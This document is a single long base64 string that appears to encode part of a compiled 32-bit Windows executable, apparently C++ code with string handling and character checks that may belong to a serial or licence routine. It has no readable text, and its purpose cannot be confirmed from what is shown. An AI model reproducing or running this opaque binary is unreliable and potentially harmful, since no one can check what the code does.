JVeCLRhSJReTHRhQPAAAAiV4QiB6DvVj///8Qcg+LjUT///9R6PstAACDxASDfeQQi03QcwONTdCNV2iKAYgCQUI6w3X2vxAAAAA5fchyDItVtFLozC0AAIPEBL4PAAAAiXXIiV3EiF20OX3kcgyLRdBQ6K0tAACDxASJdeSJXeCIXdA5fZByD4uNfP///1HokC0AAIPEBIl1kIldjIidfP///zm9dP///3IPi5Vg////UuhtLQAAg8QEibV0////iZ1w////iJ1g////Ob08////cg+LhSj///9Q6EQtAACDxASDfawQcgyLTZhR6DItAACDxASwAYtN9GSJDQAAAABZX15bi03sM83o+iwAAIvlXcO4jURAAMPMzMzMzMzMzMzMzMzMVYvsav9o3X5AAGShAAAAAFCD7AhWV6GwwkAAM8VQjUX0ZKMAAAAAi/mJfewzwIlF8DlFFHQixwdIk0AAiw24kEAAiU9oixW8kEAAiVdoiUX8x0XwAQAAAFBQjXcQVovP/xXkkEAAiweLSATHBA9Ek0AAi87HRfwBAAAAiXUU/xWgkEAAMsCLzsZF/ALHBsySQACIRlCIRkn/FVSQQADHRlQAAAAAixUQw0AAiVZMx0ZEAAAAAItFEItNDItVCFCDyQFRUovOxkX8A+hx4v//hcB1EFCLB4tIBGoCA8//FSCRQACLx4tN9GSJDQAAAABZX16L5V3CEADMzMzMzMzMzFWL7Gr/aBV/QABkoQAAAABQg+wIVqGwwkAAM8VQjUX0ZKMAAAAAiU3wi0GYi1AEx0QKmESTQACNcajHRfwAAAAAiXXsxwbMkkAAg35UAMZF/AF0HotOEI1WSDkRdRSLVjyLRkCJEYtOIIkBi1YwK8CJAoB+UAB0B4vO6DHy//+LzsZF/AD/FXSQQACLRvCLSASLFeiQQACJVDHwi030ZIkNAAAAAFlei+Vdw8zMzMzMVo1xaIvO6EX///+hvJBAAIkGiw24kEAAVokO/xW0kEAAg8QEXsPMzMzMzMzMzMzMVYvsVleNeZiNd2iLzugO////obyQQACJBosNuJBAAFaJDv8VtJBAAIPEBPZFCAF0CVfo5yoAAIPEBIvHX15dwgQAzMzMzMzMzMzMzMzMzMxVi+xq/2h9f0AAZKEAAAAAUIHsUAYAAKGwwkAAM8WJRexTVldQjUX0ZKMAAAAAiWXwi0UMi30IM9uJhQT7//+IGIvHjVABighAhMl1+SvCdQiDyP/pyAcAAI2FbP///1Doa9f//7gPAAAAg8QEiYUs+///iZ0o+///iJ0Y+///iV38iYVk+///iZ1g+///xoVQ+///AI2NGPv//1FTg+wci8zGhWz7//8AiUEUi8eJWRDGRfwBiaUM+///xgEAjXABihBAhNJ1+SvGUFfob83//+jq9P//i4UY+///g8Qkg70s+///EHMGjYUY+///agFqQGohUI2NVPr//+jQ/P//xkX8AjmduPr//3RfagJTU42NVPr///8V9JBAAI2VOPv//1KNjVT6////FfCQQACLcAgDMFNTU42NVPr///8V9JBAAIvGmVJQjYVs+///UI2NVPr///8V7JBAAI2NVPr//+hq8P//6XYBAACNjRj7//9RagGD7ByLzIvHx0EUDwAAAIlZEImlDPv//8YBAI1wAYoQQITSdfkrxlBX6J/M///oGvT//4uFGPv//74QAAAAg8QkxkX8Azm1LPv//3MGjYUY+///agFqQGohUI2NpPn//+j4+///xkX8BDmdCPr//w+FhAAAAI2NDPr//8ZF/APo2fz//42NDPr///8VwJBAAI2NvPr//8ZF/AHovvz//42NvPr///8VwJBAADm1ZPv//3IPi5VQ+///UuicKAAAg8QEx4Vk+///DwAAAImdYPv//8aFUPv//wA5tSz7//8PgsQFAACLhRj7//9Q6GooAACDxATpsAUAAGoCU1ONjaT5////FfSQQACNjTj7//9RjY2k+f///xXwkEAAi3AIAzBTU1ONjaT5////FfSQQACLxplSUI2VbPv//1KNjaT5////FeyQQACNjaT5///oCu///42NDPr//8ZF/APo+/v//42NDPr///8VwJBAAMdF/AIAAACB/oIAAAB9b42NvPr//8ZF/AHo0fv//42NvPr///8VwJBAAL4QAAAAObVk+///cg+LhVD7//9Q6KonAACDxATHhWT7//8PAAAAiZ1g+///xoVQ+///ADm1LPv//3IPi40Y+///Ueh8JwAAg8QEuPz////pwgQAAFaNlWz7//9SjY00+///x4VI+///DwAAAImdRPv//8aFNPv//wDot8r//42FNPv//1CNjVD7///GRfwG6GHt//+DvUj7//8QxkX8AnIPi400+///UegWJwAAg8QEjZVQ+///Uo21NPv//+ij7///g8QEUI2NUPv//8ZF/AfoIO3//4O9SPv//xDGRfwCcg+LhTT7//9Q6NUmAACDxASKF4pfATPJOY1g+///djbrA41JAIO9ZPv//xCLhVD7//9zBo2FUPv//zAUCA+2wg+vwI1EQAoPtvOZQff+O41g+///cs+LtWT7//+LvVD7///GhRP7//8Ax4UM+///AAAAAIv/x4UI+///AAAAAI2bAAAAADPbiZ0U+///i8+D/hBzBo2NUPv//4uFDPv//4uVCPv//40EQAPAigwBjRRSA9I6jBVs////dQW7AQAAAIvPg/4QcwaNjVD7//+APAEAdQrHhRT7//8BAAAAi8+D/hBzBo2NUPv//4pMAQE6jBVt////dQFDi8+D/hBzBo2NUPv//4B8AQEAdQb/hRT7//+Lz4P+EHMGjY1Q+///ikwBAjqMFW7///91AUOLz4P+EHMGjY1Q+///gHwBAgB1Bv+FFPv//4vPg/4QcwaNjVD7//+KTAEDOowVb////3UBQ4vPg/4QcwaNjVD7//+AfAEDAHUG/4UU+///i8+D/hBzBo2NUPv//4pMAQQ6jBVw////dQFDi8+D/hBzBo2NUPv//4B8AQQAdQb/hRT7//+Lz4P+EHMGjY1Q+///ikwBBTqMFXH///91AUOLz4P+EHMGjY1Q+///gHwBBQB1Bv+FFPv//4P7BnUIOZ0U+///dRiLhQj7//9AiYUI+///g/gKD4x7/v//6wfGhRP7//8Bi4UM+///QImFDPv//4P4Cg+MTP7//4C9E/v//wB1c42NvPr//8ZF/AHopPj//42NvPr///8VwJBAAL4QAAAAObVk+///cg+LlVD7//9S6H0kAACDxATHhWT7//8PAAAAx4Vg+///AAAAAMaFUPv//wA5tSz7//9yD4uFGPv//1DoSyQAAIPEBLj+////6ZEBAACLx4P+EHMGjYVQ+///i41g+///A8iLx4P+EHMGjYVQ+///i5UE+///UlGDwDy+DwAAADP/UI2NNPv//4m1SPv//4m9RPv//8aFNPv//wDoPeX//7sQAAAAxkX8CDmdZPv//3IPi4VQ+///UOjOIwAAg8QEi4VI+///ibVk+///ib1g+///xoVQ+///ADvDcyeLhUT7//9AUI2NNPv//1GNlVD7//9S/xUAkkAAi4VI+///g8QM6wyLjTT7//+JjVD7//+LlUT7//+LjVD7//+JlWD7//+JhWT7//87w3MGjY1Q+///i5UE+///6wONSQCKAYgCQUKEwHX2jY28+v//xkX8Aeg39///jY28+v///xXAkEAAOZ1k+///cg+LhVD7//9Q6BUjAACDxASJtWT7//+JvWD7///GhVD7//8AOZ0s+///cg+LjRj7//9R6OsiAACDxAQzwOs3x0X8AgAAALj3TkAAw42NVPr//8ZF/AHoevf//42NUPv//+iPxP//jY0Y+///6ITE//+4/f///4tN9GSJDQAAAABZX15bi03sM83oeiIAAIvlXcPMzMxVi+xRVos1ZJFAAFdoiAIAAMdF/IgCAAD/1ov4g8QEhf91CV+DyP9ei+Vdw41F/FBX6GQsAACD+G91Flf/FWCRQACLTfxR/9aL+IPECIX/dNKNVfxSVzP26D0sAACFwHU7i8eF/3RDi00IjZsAAAAAg/48fSeDuKABAAAGdRiLkJQBAACJFA5mi5CYAQAAZolUDgSDxgaLAIXAddSF/3QKV/8VYJFAAIPEBF8zwF6L5V3DzMzMzMzMzMzMzMzMzMxVi+xWi3UIajxqAFbosyQAAFboKf///4PEEF5dw8zMzFWL7ItNCIvBJQEAAIB5BUiDyP5Ai0UMdRwDRRCLVRQDVRgLwTPCD69FHA+vRSAl/wAAAF3DD69FEANFFANFGANFHANFIAvBJf8PAABdw8zMuAEAAADDzMzMzMzMzMzMzFWL7FeLfRiD/wQPgo0AAACLVRxWi3UIM8mNpCQAAAAAi8aD+hBzA41FCIA8CEF8WYvGg/oQcwONRQiAPAhaf0lBg/kDctq4AwAAADv4diaQi86D+hBzA41NCIA8ATB8KYvOg/oQcwONTQiAPAE5fxlAO8dy24P6EHIJVujOIAAAg8QEXrABX13Dg/oQcglW6LogAACDxAReMsBfXcODfRwQcgyLRQhQ6KIgAACDxAQywF9dw8zMzMzMzMzMzMzMzFWL7FGLVRgzwIlF/DvQdhiDfRwQi00IcwONTQgPvgwBAU38QDvCcuiLVTRTi10kVjP2V4t9OIP6BHIguAMAAAA70HYli8uD/xBzA41NJA++DAFAA/E7wnLr6w6Lw4P/EHMDjUUkD75wAoXSdQQzwOs0i9OD/xBzdI1VJIvKi8OD/xBzA41FJGYPvkACZg++SQFmD74SD7fAD7fJA8EPt8oDwQ+vxoN9HBCLVfyNNBByEotFCFDo1B8AAIt9OItdJIPEBMdFHA8AAADHRRgAAAAAxkUIAIP/EHIJU+iuHwAAg8QEX4vGXluL5V3Di8vrjVWL7FaL8YtOEFc7TQgPgl0BAACLRQyLQBCLVRA7wg+CTAEAAIt9FCvCO8dzAov4g8r/K9E713cLaDyVQAD/FfyQQACF/w+EHQEAAFONHDmJXRSD+/52C2g8lUAA/xX8kEAAi0YUO8NzHVFTi87o/sT//4XbD4TtAAAAi0YUg/gQcimLDusnhdt18IleEIP4EHINiwaIGFtfi8ZeXcIQAFuLxl/GAABeXcIQAIvOg/gQcgSLBusCi8aLVhArVQiLXQhSA8sDw1EDx1D/FQCSQACLRQyDxAw78HVBi0UQjRQ4O9hyAovQi0YUg/gQcgSLDusCi86D+BByEYsGVwPKUQPDUP8VAJJAAOs5VwPKi8ZRA8NQ/xUAkkAA6yi6EAAAADlQFHIEiwjrAovIOVYUcgSLBusCi8YDTRBXUQPDUOhLIQAAi00Ug8QMg34UEIlOEHIPiwZbxgQIAF+Lxl5dwhAAi8bGBAgAW1+Lxl5dwhAAaEyVQAD/FfiQQADMzMzMzFWL7IPsCItNFFOLXQhWV2r/agBTi/DohcD//78BAAAAx0X8AAAAADl9DA+ClAAAAItdEEuLRQg7WBBzQIN4FBByAosAi04UigQDiEX4g/kQcgSLFusCi9aLRhADwoP5EHIEiw7rAovOhcB0AivBi034UWoBUIvO6HTa//+LTRSLwyvHQDtBEHMIagFQ6P/B//+NR/87RhBzG4N+FBByBIsG6wKLxg++TDj/i1X8jUQK0IlF/ANdEEc7fQwPhnP///+LXQiLVhCD+gR0ZItLEL8QAAAAOXsUcgSLA+sCi8OKTAj/iE0Mi04UO89yBIsG6wKLxgPCO89yBIsO6wKLzoXAdAIrwYtVDFJqAVCLzujd2f//i0YQOX4UcgKLNg++RAb/i038X16NRAHQW4vlXcOLRfxfXluL5V3DzMzMzMzMVYvsav9oyX9AAGShAAAAAFBRVlehsMJAADPFUI1F9GSjAAAAAMdF8AAAAACLdQjHRhQPAAAAx0YQAAAAAMYGAItFDItNEItAEItJEIt+EAPBx0X8AAAAAMdF8AEAAAA7+HcmOUYUdCFqAVCLzuhuwf//hMB0E4N+FBCJfhByBIsG6wKLxsYEOACLVQxq/2oAUovO6AjX//+LRRBq/2oAUIvO6PnW//+LxotN9GSJDQAAAABZX16L5V3DzMzMzMzMVYvsUYtFEItNDFZq/2oAUMdF/AAAAADoxNb//4t1CMdGFA8AAADHRhAAAAAAUIvOxgYA6Bji//+Lxl6L5V3DzFWL7FGLRQyLUBCLTRBWi3EQV4t4FCv6x0X8AAAAADv3dheLeRQr/jv6cg5q/2oAUGoA6An8///rDGr/agBRi8joW9b//4t1CMdGFA8AAADHRhAAAAAAUIvOxgYA6K/h//9fi8Zei+Vdw8zMzMzMzMxVi+yD7DyhsMJAADPFiUX8i0UIUI1NyGhkk0AAUcdFxAAAAAD/FWyRQACNRcjHRhQPAAAAx0YQAAAAAIPEDMYGAI1QAYoIQITJdfkrwlCNVchSi87oh77//4tN/DPNi8bo7hoAAIvlXcPMzMzMzMzMVYvsg+w8obDCQAAzxYlF/ItFDItNCFBRjVXIaGiTQABSx0XEAAAAAP8VbJFAAI1FyMdGFA8AAADHRhAAAAAAg8QQxgYAjVABighAhMl1+SvCUI1FyFCLzugTvv//i038M82Lxuh6GgAAi+Vdw8zMzFWL7IPsGKGwwkAAM8WJRfyLRQhQjU3saHCTQABRx0XoAAAAAP8VbJFAAI1F7MdGFA8AAADHRhAAAAAAg8QMxgYAjVABighAhMl1+SvCUI1V7FKLzuinvf//i038M82LxugOGgAAi+Vdw8zMzMzMzMxVi+xq/2j4f0AAZKEAAAAAUFFWV6GwwkAAM8VQjUX0ZKMAAAAAi3UIx0XwAAAAAGr/agCNRQzHRhQPAAAAx0YQAAAAAFCLzsdF/AAAAADGBgDoSrz//4t9HIvPuBAAAACF/34u6wOLfRyLVQw5RSBzA41VDDlGFHIEiwbrAovGilQK/yvBSYgUOLgQAAAAhcl/1DlFIHIMi0UMUOh+GQAAg8QEi8aLTfRkiQ0AAAAAWV9ei+Vdw8zMzMzMzMzMzMxVi+xq/2gwgEAAZKEAAAAAUIPsJKGwwkAAM8WJRfBTV1CNRfRkowAAAACL+TPbiV3QiV38O30YD4bYAAAAU2g6k0AAjU3Ux0XoDwAAAIld5Ihd1Oh4vP//K30YxkX8ATv7fhJqAWhQk0AAjU3U6J7U//9Pde5q/1ONRQhQjU3U6JzT//+/DwAAAI1N1Il+FIleEIgeO/F0VoN+FBByC4sWUui4GAAAg8QEiX4UiV4QiB6DfegQcyGLReRAUI1N1FFW/xUAkkAAi0Xki03og8QMiUYQiU4U6yiLVdSLReSLTeiJFold1IlGEIlOFOsSg33oEHIMi1XUUuhhGAAAg8QEg30cEIl96Ild5Ihd1HIvi0UIUOshjU0IUcdGFA8AAACJXhCLzoge6GTe//+DfRwQcgyLVQhS6CMYAACDxASLxotN9GSJDQAAAABZX1uLTfAzzejsFwAAi+Vdw8zMzMzMVYvsav9ogYBAAGShAAAAAFCD7DChsMJAADPFiUXwU1ZQjUX0ZKMAAAAAM8CD7ByJRfyJRciLRQiL9Ill0FCJfcSL2ego/f//g8QEi8uNddToS/7//4PEHGoAvgEAAADHRxQPAAAAx0cQAAAAAGg6k0AAi8+JdfzGBwDo8br//4N95ACJdcjHRcwAAAAAD4aNAAAAg33oEItF1HMDjUXUi3UMi1YQM8mF0nQci13MihwYg34UEHIEiwbrAovGOhwIdBVBO8py6sZF0ACLVxSD+hByF4sP6xWDfjAQjUYccgKLAIoMCIhN0Ovhi8+LRxADwYP6EHIEiw/rAovPhcB0AivBi1XQUmoBUIvP6MDT//+LRcxAiUXMO0XkD4Jz////g33oEHIMi0XUUOjPFgAAg8QEi8eLTfRkiQ0AAAAAWV5bi03wM83omBYAAIvlXcPMVYvsav9oQYFAAGShAAAAAFCB7NQAAAChsMJAADPFiUXwU1ZXUI1F9GSjAAAAAItFCIt9FImNNP///4tNDImFQP///4tFHDPbUY11nImVIP///4mFJP///4mdRP///+jd+v//g8QEg32sBsdF/AEAAABzJIu1QP///1PHRhQPAAAAiV4QaDqTQACLzoge6I65///pQwIAAItNsItFnIvQg/kQcwONVZwPvhKD6jCJlTz///+L0IP5EHMDjVWcD75SAYPqMImVKP///4vQg/kQcwONVZwPvlICg+owiZUw////i9CD+RBzA41VnA++UgOD6jCJlTj///+L0IP5EHMDjVWcD75SBIPqMImVLP///4P5EHMDjUWcD75wBWoQaHSTQACNTbiD7jDHRcwPAAAAiV3IiF246Oa4//+LjSD///9q/40E/QAAAAArx41UgeRTUo1N1MZF/ALHRegPAAAAiV3kiF3U6Ma3//+LhSz///+LjTj///+LlTD///9WUIuFKP///1GLjTz///9Si1UQUIuFNP///1GLTLj8UsZF/AP/0YPEHDhdGHQpi40k////jVW4UlCNvWT////o8Pz//4PECMZF/ATHhUT///8CAAAA6yBQjbVI////6GH5//+DxATHRfwFAAAAx4VE////BAAAAL8PAAAAUI1NgIl9lIldkIhdgOjW2v//x0X8BgAAAPaFRP///wR0MYOlRP////uDvVz///8Qcg+LhUj///9Q6HgUAACDxASJvVz///+JnVj///+InUj////2hUT///8CxkX8CHQxg6VE/////YO9eP///xByD4uNZP///1HoOhQAAIPEBIm9eP///4mddP///4idZP///4u1QP///41VgIl+FIleEFKLzoge6D7a//+DjUT///8Bg32UEHIMi0WAUOj2EwAAg8QEaKATQABqAmocjU24UYl9lIldkIhdgMZF/AHoTBcAAIN9sBByDItVnFLoxRMAAIPEBIvGi030ZIkNAAAAAFlfXluLTfAzzeiNEwAAi+Vdw8zMzMzMzFWL7Gr/aJCBQABkoQAAAABQg+xQobDCQAAzxYlF8FNXUI1F9GSjAAAAAItFCGoBiUWki0UMagCJTaxoPJNAAIvOiVWwiUWo6HTG//+L+GoBjU8BUWg8k0AAi87oYMb//4vYagGNUwFSaDyTQACLzuhMxv//iUW0agFAUGg8k0AAi87oOcb//4P//3UCM/+D+/91AjPbg320/3UHx0W0AAAAAIP4/3UCM8CF/3UUhdt1EDldtHULhcB1BzLA6eoAAABXagCNRdRQi87o8dT//4tNpFDHRfwAAAAA6PHY//+DfegQx0X8/////3IMi03UUeipEgAAg8QEi9Mr10pSR1eNRdRQi87otdT//4tNrFDHRfwBAAAA6LXY//+DfegQx0X8/////3IMi03UUehtEgAAg8QEi320i9cr00pSQ1ONRdRQi87odtT//4tNsFDHRfwCAAAA6HbY//+7EAAAAMdF/P////85XehyDItN1FHoKhIAAIPEBItGEFBHV41VuFKLzug41P//i02oUMdF/AMAAADoONj//zldzHIMi0W4UOj4EQAAg8QEsAGLTfRkiQ0AAAAAWV9bi03wM83owREAAIvlXcPMzMzMzMzMzMzMVYvsav9o64FAAGShAAAAAFCD7EShsMJAADPFiUXwU1ZXUI1F9GSjAAAAAIt1GDPbiV38g/4KD4PbAAAAjWQkAGoBaFCTQACNTdTHRegPAAAAiV3kiF3U6OS0//+NRQhQjU3UUY1VuFLGRfwB6D/1//+DxAyL8I1FCL8QAAAAO8Z0Vzl9HHIMi00IUeg+EQAAg8QEx0UcDwAAAIldGIhdCDl+FHMVi0YQQFCNVQhWUv8VAJJAAIPEDOsHiwaJRQiJHotOEIlNGItWFIlVHMdGFA8AAACJXhCIHjl9zHIMi0W4UOjnEAAAg8QEx0XMDwAAAIldyIhduIhd/Dl96HIMi03UUejGEAAAg8QEi3UYg/4KD4Ip////M8mLxrocAAAA9+IPkMH32QvIM8CDwQQPksD32AvBUOhtEAAAg8QEiUWwxkX8AzvDdB1ooBNAAGggKUAAVo14BGocV4kw6EgUAACJfbDrA4ldsDP/iF38OV0YD4aXAAAAi3Wwg8bkjUkAM9KLx/d1JIXSdRSDxhyDfhQQiV4QcgSLBusCi8aIGIN9HBCLRQhzA41FCIoMOI1FtIhNtIhdtcdF6A8AAACJXeSIXdSNUAGKCEA6y3X5K8JQjVW0Uo1N1Ohjs///av9TjUXUUIvOxkX8BOihyv//g33oEIhd/HIMi03UUejNDwAAg8QERzt9GA+Ccv///4N9HBByDItVCFLosQ8AAIPEBItFsItN9GSJDQAAAABZX15bi03wM83oeA8AAIvlXcPMVYvsav9oGIJAAGShAAAAAFBRobDCQAAzxVCNRfRkowAAAACLRSQz0olV8EkPr8hQUVaNTQiJVfzoc9H//4N9HBByDItFCFDoQg8AAIPEBIvGi030ZIkNAAAAAFmL5V3DVYvsav9oG4RAAGShAAAAAFCB7DADAAChsMJAADPFiUXwU1ZXUI1F9GSjAAAAAItFJImFzPz//4tVCDPbg30cEIld/HMDjVUIvw8AAACLwom95P7//4md4P7//4id0P7//41wAYoIQDrLdfkrxlBSjY3Q/v//6Cay//+Jvaz+//+Jnaj+//+InZj+//+JvQD///+Jnfz+//+Inez+//+Jvcj+//+JncT+//+InbT+//+JvRz///+JnRj///+InQj///+Bvcz8//+ghgEAxkX8BQ+NjgAAAL4QAAAAib0c////iZ0Y////iJ0I////ib3I/v//iZ3E/v//iJ20/v//ib0A////iZ38/v//iJ3s/v//ib2s/v//iZ2o/v//iJ2Y/v//ObXk/v//cg+LjdD+//9R6PcNAACDxASJveT+//+JneD+//+IndD+//85dRxyDItVCFLo1A0AAIPEBDLA6cIMAACNhQj///9QjY2Y/v//UY210P7//42VtP7//42N7P7//+gH+v//g8QIhMAPhe4AAAC+EAAAADm1HP///3IPi5UI////UuiBDQAAg8QEib0c////iZ0Y////iJ0I////ObXI/v//cg+LhbT+//9Q6FgNAACDxASJvcj+//+JncT+//+InbT+//85tQD///9yD4uN7P7//1HoLw0AAIPEBIm9AP///4md/P7//4id7P7//zm1rP7//3IPi5WY/v//UugGDQAAg8QEib2s/v//iZ2o/v//iJ2Y/v//ObXk/v//cg+LhdD+//9Q6N0MAACDxASJveT+//+JneD+//+IndD+//85dRwPgu7+//+LTQhR6LYMAACDxAQywOmkCwAAi5UY////g8LxUleNhWD+//9QjY0I////6LHO//+D7ByLzIml1Pz//2r/U42VYP7//4l5FIlZEFLGRfwGiBno667//+gW6///g8QcOsMPhRcBAAC+EAAAADm1dP7//3IPi4Vg/v//UOhADAAAg8QEib10/v//iZ1w/v//iJ1g/v//ObUc////cg+LjQj///9R6BcMAACDxASJvRz///+JnRj///+InQj///85tcj+//9yD4uVtP7//1Lo7gsAAIPEBIm9yP7//4mdxP7//4idtP7//zm1AP///3IPi4Xs/v//UOjFCwAAg8QEib0A////iZ38/v//iJ3s/v//ObWs/v//cg+LjZj+//9R6JwLAACDxASJvaz+//+Jnaj+//+InZj+//85teT+//9yD4uV0P7//1LocwsAAIPEBIm95P7//4md4P7//4id0P7//zl1HA+ChP3//4tFCFDoTAsAAIPEBDLA6ToKAABqAWoOjY2c/f//UY2NCP///+hOzf//agJqDI2VgP3//1KNjQj////GRfwH6DTN//9qDFONhSj+//9QjY0I////xkX8COgbzf//UI2NCP///8ZF/AnoG9H//4O9PP7//xDGRfwIcg+LjSj+//9R6NAKAACDxASD7ByLzIml1Pz//2r/U42VYP7//4l5FIlZEFKIGegtrf//jYXs/v//UI2NmP7//1GNlSj+//9SxkX8Cuiv7f//jY0I////UVCNlUT+//9SxkX8C+hX7v//UYvMiaXE/P//jZW0/v//UlBRxkX8DOg87v//g8QMxkX8DujA6f//UI21DP7//+jU7v//g8Q8vhAAAAA5tVj+//9yD4uFRP7//1DoJgoAAIPEBIm9WP7//4mdVP7//4idRP7//8ZF/BE5tTz+//9yD4uNKP7//1Ho+QkAAIPEBIuVHP7//2oCg8L+Uo2FfP7//1CNjQz+//+JvTz+//+JnTj+//+InSj+///o6Mv//1CNjQz+///GRfwS6OjP///GRfwRObWQ/v//cg+LjXz+//9R6J4JAACDxAQ5tZT9//9yDouVgP3//4mV1Pz//+sMjYWA/f//iYXU/P//i4UM/v//ObUg/v//cwaNhQz+//+LPXCRQABQ/9eLjdT8//9RiYXU/P///9eDxAg7hdT8//8PhboGAABqAlONlUj9//9SjY0I////6EvL//+LhUj9///GRfwTObVc/f//cwaNhUj9//9Q/xX8kUAAg+wYi8yJpcT8//9q/4v4U42FYP7//74PAAAAiXEUiVkQUIgZ6GOr//+Njez+//9RjZWY/v//Uo2FfP7//1DGRfwU6OXr//+D7BCLzIml1Pz//42VtP7//1JQUcZF/BXoiOz//4PEDMZF/BboDOj//4PEOI2NfP7//4mF1Pz//8ZF/BPoVKr//4PsHIvMiaXE/P//av9TjYVg/v//iXEUiVkQUIgZ6OKq//+Njez+//9RjZWY/v//Uo2FKP7//1DGRfwX6GTr//+NjbT+//9RUI2VfP7//1LGRfwY6Azs//9Ri8yJpcj8//+NlQj///9SUFHGRfwZ6PHr//+DxAzGRfwb6HXn//+DxDiNjXz+///ox6n//42NKP7//8ZF/BPouKn//4uFzPz//1CNtXz+///oZuz//4PEBFOLyOgLt///igiIjdD8//+LzuiMqf//jZXQ/P//Uoid0fz///8V/JFAAFCNRehosJNAAFD/FWyRQACDxBCNTehRjY1k/f//6Bep//+DvXj9//8Qi4Vk/f//xkX8HHMGjYVk/f//UP8V/JFAAIvwjQS/A8CZ9/6DxASLyA+vzrhnZmZm9+nB+gKLwsHoHwPCK/hHi8dpwEBCDwArwIP4AX4BR4uNGP///4PB/lFqAo2VfP7//1KNjQj////oM8n//1CNjQj////GRfwd6DPN//+NjXz+///GRfwc6MSo//+D7ByNhQj///+LzImlyPz//1DorcT//42NfP7//1Hosez//4PEIFCNjQj////GRfwe6O7M//+NjXz+///og6j//7gPAAAAiYXo/f//iZ3k/f//iJ3U/f//iYUE/v//iZ0A/v//iJ3w/f//jZXw/f//UleNhQj///9qBFCNhdT9///GRfwg6Ero//9QjbW4/f//6O7q//+DxBSLjcj9//9qAUlRjZV8/v//UovOxkX8IehfyP//UIvOxkX8IuhjzP//jY18/v//xkX8Iej0p///i7Wc/f//uBAAAAA5hbD9//9zBo21nP3//zmFzP3//4uFuP3//3MNjYW4/f//jaQkAAAAAIoIOg51GjrLdBKKSAE6TgF1DoPAAoPGAjrLdeQzwOsFG8CD2P87ww+FBgMAAIPsHI2F1P3//4vMiaXI/P//UOh8w///jY18/v//UeiA6///g8QgUI2N1P3//8ZF/CPovcv//42NfP7//8ZF/CHoTqf//4uVAP7//0pSagGNhUT+//9QjY3w/f//6ILH//+L8GoBU42NKP7//1GNjfD9///GRfwk6GfH//+NldT9//9SUI2FfP7//1DGRfwl6A/p//9WUI2N2Pz//1HGRfwm6D3p//+DxBiNjXz+///o36b//42NKP7//+jUpv//jY1E/v//xkX8KujFpv//i4XM/P//i43U/P//U5lRUlDoHwkAAFJQjbX0/P//6NLp//+DxAhqAoPsHMZF/CuLzImlyPz//4vWUuiGwv//6OHy//+DxCBonJNAAI2NJP///4v4x4VM/v//cFBAAMeFUP7//yBQQADHhVT+//9wUEAAx4VY/v//cFBAAMeFXP7//3BQQADo+qX//2iIk0AAjY1A////xkX8LOjmpf//aJyTQACNjVz////GRfwt6NKl//9onJNAAI2NeP///8ZF/C7ovqX//2ick0AAjU2UxkX8L+itpf//aJyTQACNTbDGRfww6Jyl//9onJNAAI1NzMZF/DHoi6X//2oCg+wcjYXY/P//i8yJpcj8//9QxkX8Mr4CAAAA6KnB//+Lzo21EP3//+g89P//g8Qgg38wEI1HHMZF/DNyAosAagJqAWoCUP8V/JFAAIuNzPz//4PEBFBRjZUs/f//Uo2VJP///42NTP7//+ja7P//g8QYi7UQ/f//uBAAAADGRfw0OYUk/f//cwaNtRD9//85hUD9//+LhSz9//9zDI2FLP3//42bAAAAAIoIOg51GjrLdBKKSAE6TgF1DoPAAoPGAjrLdeQzwOsFG8CD2P87ww+EDwEAADv7dB2LR/xooBNAAI13/FBqHFfogQYAAFboFwYAAIPEBI2NLP3//+jHpP//jY0Q/f//6Lyk//9ooBNAAGoHahyNjST///9RxkX8K+hJBgAAjY30/P//6Jik//+Njdj8///ojaT//42NuP3//+iCpP//jY3w/f//6Hek//+NjdT9///obKT//42NZP3//+hhpP//jY1I/f//6Fak//+NjQz+///oS6T//42NgP3//+hApP//jY2c/f//6DWk//+NjWD+///oKqT//42NCP///+gfpP//jY20/v//6BSk//+Njez+///oCaT//42NmP7//+j+o///jY3Q/v//6POj//+NTQjo66P//zLA6QoBAAA7+3Qdi1f8aKATQACNd/xSahxX6HIFAABW6AgFAACDxASNjSz9///ouKP//42NEP3//+ito///aKATQABqB2ocjYUk////UMZF/CvoOgUAAI2N9Pz//+iJo///jY3Y/P//6H6j//+Njbj9///oc6P//42N8P3//+hoo///jY3U/f//6F2j//+NjWT9///oUqP//42NSP3//+hHo///jY0M/v//6Dyj//+NjYD9///oMaP//42NnP3//+gmo///jY1g/v//6Buj//+NjQj////oEKP//42NtP7//+gFo///jY3s/v//6Pqi//+NjZj+///o76L//42N0P7//+jkov//jU0I6Nyi//+wAYtN9GSJDQAAAABZX15bi03wM83o1QAAAIvlXcOLSQT/FUyQQACFwHQIixBqAYvI/xLDi/9Vi+xqCOgcAQAAWYXAdBCLDRjDQACJCItNCIlIBOsCM8CjGMNAAF3DagS4TIRAAOgWBQAAagCNTfD/FXCQQACDZfwA6xeL8IsAi86jGMNAAOiT////Vuh5AAAAWaEYw0AAhcB14INN/P+NTfD/FWSQQADoBgUAAMP/JXiQQAD/JXyQQAD/JYCQQAD/JYSQQAD/JYiQQAD/JYyQQAD/JZCQQAD/JZSQQAD/JZiQQACL/1WL7F3pbQAAADsNsMJAAHUC88PpgQUAAP8lDJJAAP8lBJJAAP8l+JFAAIv/VYvs9kUIAleL+XQlVmjCe0AAjXf8/zZqDFfoUQMAAPZFCAF0B1bozf///1mLxl7rFOi2CQAA9kUIAXQHV+i2////WYvHX13CBAD/JfSRQABoxnhAAOj8BAAAoWjGQADHBCQ0w0AA/zVkxkAAozTDQABoJMNAAGgow0AAaCDDQAD/FXiRQACDxBSjMMNAAIXAeQhqCOgrBgAAWcNqEGgAo0AA6OMHAAAz2zkdhMZAAHULU1NqAVP/FTCQQACJXfxkoRgAAACLcASJXeS/eMZAAFNWV/8VNJBAADvDdBk7xnUIM/ZGiXXk6xBo6AMAAP8VOJBAAOvaM/ZGoXTGQAA7xnUKah/ouwUAAFnrO6F0xkAAhcB1LIk1dMZAAGhAkkAAaDSSQADoUgcAAFlZhcB0F8dF/P7///+4/wAAAOndAAAAiTU8w0AAoXTGQAA7xnUbaDCSQABoJJJAAOgXBwAAWVnHBXTGQAACAAAAOV3kdQhTV/8VPJBAADkdiMZAAHQZaIjGQADoMAYAAFmFwHQKU2oCU/8ViMZAAKEkw0AAiw2MkUAAiQH/NSTDQAD/NSjDQAD/NSDDQADorZz//4PEDKM4w0AAOR0sw0AAdTdQ/xWIkUAAi0XsiwiLCYlN4FBR6DEFAABZWcOLZeiLReCjOMNAADPbOR0sw0AAdQdQ/xWAkUAAOR08w0AAdQb/FXyRQADHRfz+////oTjDQADorAYAAMO4TVoAAGY5BQAAQAB0BDPA6zWhPABAAIG4AABAAFBFAAB167kLAQAAZjmIGABAAHXdg7h0AEAADnbUM8k5iOgAQAAPlcGLwWoBoyzDQAD/FaiR